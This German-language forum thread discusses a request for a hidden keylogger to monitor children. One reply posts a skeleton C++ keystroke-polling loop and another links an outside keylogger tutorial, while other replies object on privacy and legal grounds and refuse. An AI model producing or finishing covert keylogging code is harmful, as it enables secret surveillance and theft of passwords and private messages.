Keylogger Programming

UnBeLiEvAbLe

The Unbelieve :P
Liebe Community,
ich bin neu hier, und würde gerne ein Tutorial zum erstellen eines Keyloggers haben.
Meine Kinder sitzen oft länger als gewünscht an ihren Computern, und ich würde gerne von meinem Laptop aus überprüfen, was sie denn da machen.
Der Keylogger sollte am besten im Hintergrund laufen.
Wenn ihr mir da ein nettes Tutorial machen könntet, wäre ich euch sehr dankbar.

Mit freundlichen Grüßen,
UnBeLiEvAbLe
 
Nur als Anhaltspunkt, wie das ungefähr abläuft:
C++:
#include<stdio.h>
#include<iostream.h>
#include<windows.h>

int __stdcall WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
	SHORT KeyState;SHORT ArrKeyState[256];
	long CheckSum;long OldCheckSum;
	OldCheckSum=987654;
	while(1)
	{
		CheckSum=0;
		for(int i=0;i<256;i++)
		{
			KeyState=GetAsyncKeyState(i);
			CheckSum+=KeyState;
			ArrKeyState[i]=KeyState;
		}
		if(OldCheckSum!=CheckSum)
		{
			for(int i=0;i<256;i++)
			{
				if(ArrKeyState[i]==-32767)
				{
					//Irgendwas machen, i ist der Asciicode
				}
			}
		}
		Sleep(1);
		OldCheckSum=CheckSum;
	}
	return 0;
}
Sachen wie STRG etc bleiben hier unberücksichtigt, um die Webseitenaufrufe zu protokollieren, gehts so aber auch

@Vereth: Wenn es nur für den eigenen PC ist, gehts so ganz gut.
Bei anderen gibts ein paar Probleme, zB so ziemlich alle AVs werden das erkennen
 
Mir fallen momentan nur zwei Bereiche ein, in denen ein solches Programm nutzbare Informationen liefert: das Abhören von Chat-Kommunikation sowie das Protokollieren von Brieferstellungen und Notizen. Das eine ist ein Lauschangriff, der gegen das Post- und Fernmeldegeheimnis verstößt, das andere verletzt die Privatsphäre. Außerdem fehlt ihm zum realitätsnahen Interpretieren das Wissen um den Kontext, weil viele Sachen mit der Maus gemacht werden (Positionieren im Text, Löschen, Starten von Programmen etc.).
Wenn er Angst wegen des Umgangs seiner Kinder hat, soll er ihnen einen eigenen Account mit entsprechenden Sicherheitsbeschränkungen einrichten. Wenn er nicht weiß, wie man so etwas macht und was dabei zu beachten ist, kann er diesbezügliche Fragen im Forum veröffentlichen. Natürlich im richtigen Bereich.

PS: Mich wundert, dass ein Platin-Mitglied so leichtfertig dabei mitmacht.
 
Zuletzt bearbeitet:
Hey,

also ich wollte auch mal einen Key-Logger programmieren, nur leider hatte ich noch keine Zeit dafür. Bei meinen Recherchen damals bin ich auf diese Internetseite gestoßen, auf der einer beschrieben wird.
Ziehmlich ausführlich und mit dem passenden Code. Wie gesagt, ich hab den Code auf der Seite noch nicht ausprobieren können, aber vllt funktioniert er ja wirklich.

http://www.levoltz.com/2007/12/12/keylogging-fun-for-cc-beginners/

Viel Spaß damit :D
 
1: Googel überhäuft dich mit Keyloogern.
2: Forumsuche benutzen - Es gibt genug Artikel zu diesem Thema.
3: einen Keylogger wird dir heir keiner schreiben, wie es im Prinziep abläuft hat dir shel erklärt.

Abgesehen davon, wir alle wissen was man mit Keylogger anstellen kann.
Ich glaube kaum dass du das Protokoll der Eingaben deiner Kinder stundenlang analysieren willst, dazu gibts auch Remote-Tools.
Was du vor hast ist also im Prinzip ein Tojaner, wenn ich das richtig sehe. Ein Tool, was die Eingabe von Daten (alles Daten, auch vertraulichen) über ein Übertragungsmedium, bsp. TCP/IP-Verbindung, senden soll. Ich würde sowas als, ich meide jetzt mal legal und illegal, unmoralisch ansehen - somit also auch nicht unterstützungsbedürftig.

Falls mein Vorwurf wiederlegt werden kann, so erkläre ich mich gere Bereit zu helfen, ansonsten keine unterstützung für Spyware.

MfG
 
Zurück